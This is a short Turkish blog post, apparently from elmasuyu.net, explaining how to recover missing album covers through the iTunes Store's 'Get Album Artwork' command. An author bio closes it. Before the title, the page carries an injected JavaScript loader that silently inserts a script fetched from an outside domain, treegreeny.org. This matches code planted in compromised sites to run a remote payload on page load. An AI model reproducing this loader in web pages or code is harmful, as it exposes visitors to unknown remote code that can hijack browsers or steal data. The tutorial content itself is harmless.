;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Hala Albüm Kapaklarınız Yok mu? - elmasuyu.net
Kategoriler
Genel

Hala Albüm Kapaklarınız Yok mu?

iTunes’un yurt dışındaki en önemli hizmetlerinden biri de eksik olan albüm kapaklarının tamamlama özelliğidir. iTunes mağazası Türkiye’de de açıldıktan sonra aynı süreç bizim için de geçerli olacaktı. iTunes mağazasının açıldığı ilk günden sonra albüm kapakları hizmetini de sıkça takip etmekteydik. İlk günlerde iTunes Türkiye arşivinde az sayıda albüm olacaktı ki albüm kapaklarını talep ettiğinizde hep aynı sorun ile karşılaşıyorduk. Yani bulunamıyordu albüm kapakları. Geçtiğimiz günlerde tekrardan bir kontrol etmek istedim ve karşıma çok ilginç sonuçlar çıktı. Artık iTunes Türkiye Mağazası gerçek anlamda albüm kapaklarını size temin edebiliyordu.

Denemek için daha öncesinde albüm kapağını oluşturduğum ama daha sonra ne hikmetse silindiğini fark ettiğim Nazan Öncel’in bir albümü ile başladım.

Öncelikle albüm kapağının olmadığından emin olun. Üstteki görüntüde Hatırına Sustum albümünün kapağı yok. Sonra şarkılardan birinin üzerine gidip sağ tıklayarak Get Album Artwork yani Albüm Resmini Al komutunu veriyoruz.

Sonrasında karşımıza başka bir uyarı penceresi çıkıyor. Bu uyarı penceresinde size emin olup olmadığını soruluyor. Biz de eminiz diyerek Get Album Artwork yani Albüm Resmini Al komutunu veriyoruz.

ve sonrasında ta ta ta taaam

iTunes Müzik mağazasındaki albüm sayısı arttıkça en bilinmedik sanatçılara kadar albüm kapaklarını bulma imkanınız artacak. Valla ben Bülent Ersoy’un albümlerinin kapaklarını bile buldum, daha ne diyeyim?

Yazar Cem YENER

ElmaSuyu.Net Yöneticisi - Site faaliyetlerinin yanında bilgisayar dünyası ile yakından ilgili. Mac ve iOS özellikle ilgilendi konulardır.
Üniversite Program Koordinatörü - Bir devlet üniversitesinin İngilizce Hazırlık Programı Koordinatörü ve Akademik Direktörlüğünü yürütmekte.
@jamwinner